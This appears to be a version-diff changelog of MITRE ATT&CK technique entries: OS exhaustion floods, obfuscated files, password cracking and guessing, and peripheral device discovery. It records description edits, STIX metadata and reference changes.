>ust the limits that an OS self-imposes to prevent the entire>e demands on its capacity. These attacks do not need to exha
> system from being overwhelmed by excessive demands on its c>ust the actual resources on a system; the attacks may simply
>apacity.  Different ways to achieve this exist, including TC> exhaust the limits and available resources that an OS self-
>P state-exhaustion attacks such as SYN floods and ACK floods>imposes.  Different ways to achieve this exist, including TC
>.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods,>P state-exhaustion attacks such as SYN floods and ACK floods
> excessive amounts of SYN packets are sent, but the 3-way TC>.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods,
>P handshake is never completed. Because each OS has a maximu> excessive amounts of SYN packets are sent, but the 3-way TC
>m number of concurrent TCP connections that it will allow, t>P handshake is never completed. Because each OS has a maximu
>his can quickly exhaust the ability of the system to receive>m number of concurrent TCP connections that it will allow, t
> new requests for TCP connections, thus preventing access to>his can quickly exhaust the ability of the system to receive
> any TCP service provided by the server.(Citation: Cloudflar> new requests for TCP connections, thus preventing access to
>e SynFlood)  ACK floods leverage the stateful nature of the > any TCP service provided by the server.(Citation: Cloudflar
>TCP protocol. A flood of ACK packets are sent to the target.>e SynFlood)  ACK floods leverage the stateful nature of the 
> This forces the OS to search its state table for a related >TCP protocol. A flood of ACK packets are sent to the target.
>TCP connection that has already been established. Because th> This forces the OS to search its state table for a related 
>e ACK packets are for connections that do not exist, the OS >TCP connection that has already been established. Because th
>will have to search the entire state table to confirm that n>e ACK packets are for connections that do not exist, the OS 
>o match exists. When it is necessary to do this for a large >will have to search the entire state table to confirm that n
>flood of packets, the computational requirements can cause t>o match exists. When it is necessary to do this for a large 
>he server to become sluggish and/or unresponsive, due to the>flood of packets, the computational requirements can cause t
> work it must do to eliminate the rogue ACK packets. This gr>he server to become sluggish and/or unresponsive, due to the
>eatly reduces the resources available for providing the targ> work it must do to eliminate the rogue ACK packets. This gr
>eted service.(Citation: Corero SYN-ACKflood)>eatly reduces the resources available for providing the targ
 >eted service.(Citation: Corero SYN-ACKflood)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesCisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.
external_referencesCloudflare. (n.d.). What is a SYN flood attack?. Retrieved April 22, 2019.
external_referencesCAPEC-469
external_referencesCAPEC-482
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-469
external_referencesCAPEC-482
external_referencesCorero. (n.d.). What is a SYN-ACK Flood Attack?. Retrieved April 22, 2019.
external_referencesCisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.
values_changed
STIX FieldOld valueNew Value
modified2020-09-16 15:54:35.429000+00:002022-04-19 23:12:31.329000+00:00
descriptionAdversaries may target the operating system (OS) for a DoS attack, since the (OS) is responsible for managing the finite resources on a system. These attacks do not need to exhaust the actual resources on a system since they can simply exhaust the limits that an OS self-imposes to prevent the entire system from being overwhelmed by excessive demands on its capacity. Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood) ACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood)Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes. Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood) ACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood)
external_references[1]['source_name']capecCisco DoSdetectNetflow
external_references[1]['url']https://capec.mitre.org/data/definitions/469.htmlhttps://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
external_references[2]['source_name']capecCloudflare SynFlood
external_references[2]['url']https://capec.mitre.org/data/definitions/482.htmlhttps://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/
external_references[3]['source_name']Arbor AnnualDoSreport Jan 2018Corero SYN-ACKflood
external_references[3]['description']Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide Infrastructure Security Report. Retrieved April 22, 2019.Corero. (n.d.). What is a SYN-ACK Flood Attack?. Retrieved April 22, 2019.
external_references[3]['url']https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdfhttps://www.corero.com/resources/ddos-attack-types/syn-flood-ack.html
external_references[4]['source_name']Cloudflare SynFloodArbor AnnualDoSreport Jan 2018
external_references[4]['description']Cloudflare. (n.d.). What is a SYN flood attack?. Retrieved April 22, 2019.Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide Infrastructure Security Report. Retrieved April 22, 2019.
external_references[4]['url']https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
external_references[5]['source_name']Corero SYN-ACKfloodcapec
external_references[5]['url']https://www.corero.com/resources/ddos-attack-types/syn-flood-ack.htmlhttps://capec.mitre.org/data/definitions/469.html
external_references[6]['source_name']Cisco DoSdetectNetflowcapec
external_references[6]['url']https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdfhttps://capec.mitre.org/data/definitions/482.html
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Traffic Flow
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Traffic Flow

[T1027] Obfuscated Files or Information

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may attempt to make an executable or file diffict1Adversaries may attempt to make an executable or file diffic
>ult to discover or analyze by encrypting, encoding, or other>ult to discover or analyze by encrypting, encoding, or other
>wise obfuscating its contents on the system or in transit. T>wise obfuscating its contents on the system or in transit. T
>his is common behavior that can be used across different pla>his is common behavior that can be used across different pla
>tforms and the network to evade defenses.   Payloads may be >tforms and the network to evade defenses.   Payloads may be 
>compressed, archived, or encrypted in order to avoid detecti>compressed, archived, or encrypted in order to avoid detecti
>on. These payloads may be used during Initial Access or late>on. These payloads may be used during Initial Access or late
>r to mitigate detection. Sometimes a user's action may be re>r to mitigate detection. Sometimes a user's action may be re
>quired to open and [Deobfuscate/Decode Files or Information]>quired to open and [Deobfuscate/Decode Files or Information]
>(https://attack.mitre.org/techniques/T1140) for [User Execut>(https://attack.mitre.org/techniques/T1140) for [User Execut
>ion](https://attack.mitre.org/techniques/T1204). The user ma>ion](https://attack.mitre.org/techniques/T1204). The user ma
>y also be required to input a password to open a password pr>y also be required to input a password to open a password pr
>otected compressed/encrypted file that was provided by the a>otected compressed/encrypted file that was provided by the a
>dversary. (Citation: Volexity PowerDuke November 2016) Adver>dversary. (Citation: Volexity PowerDuke November 2016) Adver
>saries may also used compressed or archived scripts, such as>saries may also use compressed or archived scripts, such as 
> JavaScript.   Portions of files can also be encoded to hide>JavaScript.   Portions of files can also be encoded to hide 
> the plain-text strings that would otherwise help defenders >the plain-text strings that would otherwise help defenders w
>with discovery. (Citation: Linux/Cdorked.A We Live Security >ith discovery. (Citation: Linux/Cdorked.A We Live Security A
>Analysis) Payloads may also be split into separate, seemingl>nalysis) Payloads may also be split into separate, seemingly
>y benign files that only reveal malicious functionality when> benign files that only reveal malicious functionality when 
> reassembled. (Citation: Carbon Black Obfuscation Sept 2016)>reassembled. (Citation: Carbon Black Obfuscation Sept 2016) 
>  Adversaries may also obfuscate commands executed from payl> Adversaries may also obfuscate commands executed from paylo
>oads or directly via a [Command and Scripting Interpreter](h>ads or directly via a [Command and Scripting Interpreter](ht
>ttps://attack.mitre.org/techniques/T1059). Environment varia>tps://attack.mitre.org/techniques/T1059). Environment variab
>bles, aliases, characters, and other platform/language speci>les, aliases, characters, and other platform/language specif
>fic semantics can be used to evade signature based detection>ic semantics can be used to evade signature based detections
>s and application control mechanisms. (Citation: FireEye Obf> and application control mechanisms. (Citation: FireEye Obfu
>uscation June 2017) (Citation: FireEye Revoke-Obfuscation Ju>scation June 2017) (Citation: FireEye Revoke-Obfuscation Jul
>ly 2017)(Citation: PaloAlto EncodedCommand March 2017) >y 2017)(Citation: PaloAlto EncodedCommand March 2017) 

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesAdair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.
external_referencesCAPEC-267
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-267
external_referencesCarr, N. (2016, August 14). OfficeCrackros. Retrieved February 12, 2018.
values_changed
STIX FieldOld valueNew Value
modified2021-10-20 16:33:13.472000+00:002022-09-30 18:06:32.808000+00:00
descriptionAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as JavaScript. Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016) Adversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also use compressed or archived scripts, such as JavaScript. Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016) Adversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017)
external_references[1]['source_name']capecVolexity PowerDuke November 2016
external_references[1]['url']https://capec.mitre.org/data/definitions/267.htmlhttps://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/
external_references[2]['source_name']Volexity PowerDuke November 2016GitHub Revoke-Obfuscation
external_references[2]['description']Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.Bohannon, D. (2017, July 27). Revoke-Obfuscation. Retrieved February 12, 2018.
external_references[2]['url']https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/https://github.com/danielbohannon/Revoke-Obfuscation
external_references[3]['source_name']Linux/Cdorked.A We Live Security AnalysisFireEye Obfuscation June 2017
external_references[3]['description']Pierre-Marc Bureau. (2013, April 26). Linux/Cdorked.A: New Apache backdoor being used in the wild to serve Blackhole. Retrieved September 10, 2017.Bohannon, D. & Carr N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February 12, 2018.
external_references[3]['url']https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html
external_references[4]['source_name']Carbon Black Obfuscation Sept 2016FireEye Revoke-Obfuscation July 2017
external_references[4]['description']Tedesco, B. (2016, September 23). Security Alert Summary. Retrieved February 12, 2018.Bohannon, D. & Holmes, L. (2017, July 27). Revoke-Obfuscation: PowerShell Obfuscation Detection Using Science. Retrieved February 12, 2018.
external_references[4]['url']https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdf
external_references[5]['source_name']FireEye Obfuscation June 2017GitHub Office-Crackros Aug 2016
external_references[5]['description']Bohannon, D. & Carr N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February 12, 2018.Carr, N. (2016, August 14). OfficeCrackros. Retrieved February 12, 2018.
external_references[5]['url']https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.htmlhttps://github.com/itsreallynick/office-crackros
external_references[6]['source_name']FireEye Revoke-Obfuscation July 2017Linux/Cdorked.A We Live Security Analysis
external_references[6]['description']Bohannon, D. & Holmes, L. (2017, July 27). Revoke-Obfuscation: PowerShell Obfuscation Detection Using Science. Retrieved February 12, 2018.Pierre-Marc Bureau. (2013, April 26). Linux/Cdorked.A: New Apache backdoor being used in the wild to serve Blackhole. Retrieved September 10, 2017.
external_references[6]['url']https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdfhttps://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/
external_references[7]['source_name']PaloAlto EncodedCommand March 2017Carbon Black Obfuscation Sept 2016
external_references[7]['description']White, J. (2017, March 10). Pulling Back the Curtains on EncodedCommand PowerShell Attacks. Retrieved February 12, 2018.Tedesco, B. (2016, September 23). Security Alert Summary. Retrieved February 12, 2018.
external_references[7]['url']https://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/
external_references[8]['source_name']GitHub Revoke-ObfuscationPaloAlto EncodedCommand March 2017
external_references[8]['description']Bohannon, D. (2017, July 27). Revoke-Obfuscation. Retrieved February 12, 2018.White, J. (2017, March 10). Pulling Back the Curtains on EncodedCommand PowerShell Attacks. Retrieved February 12, 2018.
external_references[8]['url']https://github.com/danielbohannon/Revoke-Obfuscationhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/
external_references[9]['source_name']GitHub Office-Crackros Aug 2016capec
external_references[9]['url']https://github.com/itsreallynick/office-crackroshttps://capec.mitre.org/data/definitions/267.html
x_mitre_data_sources[3]File: File MetadataProcess: OS API Execution
x_mitre_data_sources[5]Process: Process CreationModule: Module Load
x_mitre_defense_bypassed[0]Host forensic analysisHost Forensic Analysis
x_mitre_defense_bypassed[1]Signature-based detectionSignature-based Detection
x_mitre_defense_bypassed[2]Host intrusion prevention systemsHost Intrusion Prevention Systems
x_mitre_defense_bypassed[3]Application controlApplication Control
x_mitre_defense_bypassed[4]Log analysisLog Analysis
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation
x_mitre_data_sourcesFile: File Metadata
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_defense_bypassedApplication control by file name or path

[T1110.002] Brute Force: Password Cracking

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may use password cracking to attempt to recover t1Adversaries may use password cracking to attempt to recover 
>usable credentials, such as plaintext passwords, when creden>usable credentials, such as plaintext passwords, when creden
>tial material such as password hashes are obtained. [OS Cred>tial material such as password hashes are obtained. [OS Cred
>ential Dumping](https://attack.mitre.org/techniques/T1003) i>ential Dumping](https://attack.mitre.org/techniques/T1003) c
>s used to obtain password hashes, this may only get an adver>an be used to obtain password hashes, this may only get an a
>sary so far when [Pass the Hash](https://attack.mitre.org/te>dversary so far when [Pass the Hash](https://attack.mitre.or
>chniques/T1550/002) is not an option. Techniques to systemat>g/techniques/T1550/002) is not an option. Further,  adversar
>ically guess the passwords used to compute hashes are availa>ies may leverage [Data from Configuration Repository](https:
>ble, or the adversary may use a pre-computed rainbow table t>//attack.mitre.org/techniques/T1602) in order to obtain hash
>o crack hashes. Cracking hashes is usually done on adversary>ed credentials for network devices.(Citation: US-CERT-TA18-1
>-controlled systems outside of the target network.(Citation:>06A)   Techniques to systematically guess the passwords used
> Wikipedia Password cracking) The resulting plaintext passwo> to compute hashes are available, or the adversary may use a
>rd resulting from a successfully cracked hash may be used to> pre-computed rainbow table to crack hashes. Cracking hashes
> log into systems, resources, and services in which the acco> is usually done on adversary-controlled systems outside of 
>unt has access.>the target network.(Citation: Wikipedia Password cracking) T
 >he resulting plaintext password resulting from a successfull
 >y cracked hash may be used to log into systems, resources, a
 >nd services in which the account has access.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Mohamed Kmal']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesUS-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
external_referencesCAPEC-55
values_changed
STIX FieldOld valueNew Value
modified2020-09-16 15:39:59.041000+00:002022-04-19 21:33:46.023000+00:00
descriptionAdversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) can be used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Further, adversaries may leverage [Data from Configuration Repository](https://attack.mitre.org/techniques/T1602) in order to obtain hashed credentials for network devices.(Citation: US-CERT-TA18-106A) Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.
external_references[1]['source_name']capecUS-CERT-TA18-106A
external_references[1]['url']https://capec.mitre.org/data/definitions/55.htmlhttps://www.us-cert.gov/ncas/alerts/TA18-106A
x_mitre_data_sources[0]User Account: User Account AuthenticationApplication Log: Application Log Content
x_mitre_data_sources[1]Application Log: Application Log ContentUser Account: User Account Authentication
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/55.html', 'external_id': 'CAPEC-55'}
x_mitre_platformsNetwork

[T1110.001] Brute Force: Password Guessing

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries with no prior knowledge of legitimate credentialt1Adversaries with no prior knowledge of legitimate credential
>s within the system or environment may guess passwords to at>s within the system or environment may guess passwords to at
>tempt access to accounts. Without knowledge of the password >tempt access to accounts. Without knowledge of the password 
>for an account, an adversary may opt to systematically guess>for an account, an adversary may opt to systematically guess
> the password using a repetitive or iterative mechanism. An > the password using a repetitive or iterative mechanism. An 
>adversary may guess login credentials without prior knowledg>adversary may guess login credentials without prior knowledg
>e of system or environment passwords during an operation by >e of system or environment passwords during an operation by 
>using a list of common passwords. Password guessing may or m>using a list of common passwords. Password guessing may or m
>ay not take into account the target's policies on password c>ay not take into account the target's policies on password c
>omplexity or use policies that may lock accounts out after a>omplexity or use policies that may lock accounts out after a
> number of failed attempts.  Guessing passwords can be a ris> number of failed attempts.  Guessing passwords can be a ris
>ky option because it could cause numerous authentication fai>ky option because it could cause numerous authentication fai
>lures and account lockouts, depending on the organization's >lures and account lockouts, depending on the organization's 
>login failure policies. (Citation: Cylance Cleaver)  Typical>login failure policies. (Citation: Cylance Cleaver)  Typical
>ly, management services over commonly used ports are used wh>ly, management services over commonly used ports are used wh
>en guessing passwords. Commonly targeted services include th>en guessing passwords. Commonly targeted services include th
>e following:  * SSH (22/TCP) * Telnet (23/TCP) * FTP (21/TCP>e following:  * SSH (22/TCP) * Telnet (23/TCP) * FTP (21/TCP
>) * NetBIOS / SMB / Samba (139/TCP & 445/TCP) * LDAP (389/TC>) * NetBIOS / SMB / Samba (139/TCP & 445/TCP) * LDAP (389/TC
>P) * Kerberos (88/TCP) * RDP / Terminal Services (3389/TCP) >P) * Kerberos (88/TCP) * RDP / Terminal Services (3389/TCP) 
>* HTTP/HTTP Management Services (80/TCP & 443/TCP) * MSSQL (>* HTTP/HTTP Management Services (80/TCP & 443/TCP) * MSSQL (
>1433/TCP) * Oracle (1521/TCP) * MySQL (3306/TCP) * VNC (5900>1433/TCP) * Oracle (1521/TCP) * MySQL (3306/TCP) * VNC (5900
>/TCP)  In addition to management services, adversaries may ">/TCP) * SNMP (161/UDP and 162/TCP/UDP)  In addition to manag
>target single sign-on (SSO) and cloud-based applications uti>ement services, adversaries may "target single sign-on (SSO)
>lizing federated authentication protocols," as well as exter> and cloud-based applications utilizing federated authentica
>nally facing email applications, such as Office 365.(Citatio>tion protocols," as well as externally facing email applicat
>n: US-CERT TA18-068A 2018)  In default environments, LDAP an>ions, such as Office 365.(Citation: US-CERT TA18-068A 2018).
>d Kerberos connection attempts are less likely to trigger ev> Further, adversaries may abuse network device interfaces (s
>ents over SMB, which creates Windows "logon failure" event I>uch as `wlanAPI`) to brute force accessible wifi-router(s) v
>D 4625.>ia wireless authentication protocols.(Citation: Trend Micro 
 >Emotet 2020)  In default environments, LDAP and Kerberos con
 >nection attempts are less likely to trigger events over SMB,
 > which creates Windows "logon failure" event ID 4625.

New Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesCybercrime & Digital Threat Team. (2020, February 13). Emotet Now Spreads via Wi-Fi. Retrieved February 16, 2022.
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
external_referencesCAPEC-49
values_changed
STIX FieldOld valueNew Value
modified2021-04-21 16:41:35.269000+00:002022-07-22 18:37:22.173000+00:00
descriptionAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts. Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver) Typically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following: * SSH (22/TCP) * Telnet (23/TCP) * FTP (21/TCP) * NetBIOS / SMB / Samba (139/TCP & 445/TCP) * LDAP (389/TCP) * Kerberos (88/TCP) * RDP / Terminal Services (3389/TCP) * HTTP/HTTP Management Services (80/TCP & 443/TCP) * MSSQL (1433/TCP) * Oracle (1521/TCP) * MySQL (3306/TCP) * VNC (5900/TCP) In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018) In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts. Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver) Typically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following: * SSH (22/TCP) * Telnet (23/TCP) * FTP (21/TCP) * NetBIOS / SMB / Samba (139/TCP & 445/TCP) * LDAP (389/TCP) * Kerberos (88/TCP) * RDP / Terminal Services (3389/TCP) * HTTP/HTTP Management Services (80/TCP & 443/TCP) * MSSQL (1433/TCP) * Oracle (1521/TCP) * MySQL (3306/TCP) * VNC (5900/TCP) * SNMP (161/UDP and 162/TCP/UDP) In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018). Further, adversaries may abuse network device interfaces (such as `wlanAPI`) to brute force accessible wifi-router(s) via wireless authentication protocols.(Citation: Trend Micro Emotet 2020) In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.
external_references[1]['source_name']capecTrend Micro Emotet 2020
external_references[1]['url']https://capec.mitre.org/data/definitions/49.htmlhttps://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/emotet-now-spreads-via-wi-fi
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/49.html', 'external_id': 'CAPEC-49'}
x_mitre_contributorsMohamed Kmal
x_mitre_platformsNetwork

[T1120] Peripheral Device Discovery

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may attempt to gather information about attachedt1Adversaries may attempt to gather information about attached
> peripheral devices and components connected to a computer s> peripheral devices and components connected to a computer s
>ystem. Peripheral devices could include auxiliary resources >ystem.(Citation: Peripheral Discovery Linux)(Citation: Perip
>that support a variety of functionalities such as keyboards,>heral Discovery macOS) Peripheral devices could include auxi
> printers, cameras, smart card readers, or removable storage>liary resources that support a variety of functionalities su
>. The information may be used to enhance their awareness of >ch as keyboards, printers, cameras, smart card readers, or r
>the system and network environment or may be used for furthe>emovable storage. The information may be used to enhance the
>r actions.>ir awareness of the system and network environment or may be
 > used for further actions.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-26 17:42:03.337000+00:002022-03-11 18:39:11.763000+00:00
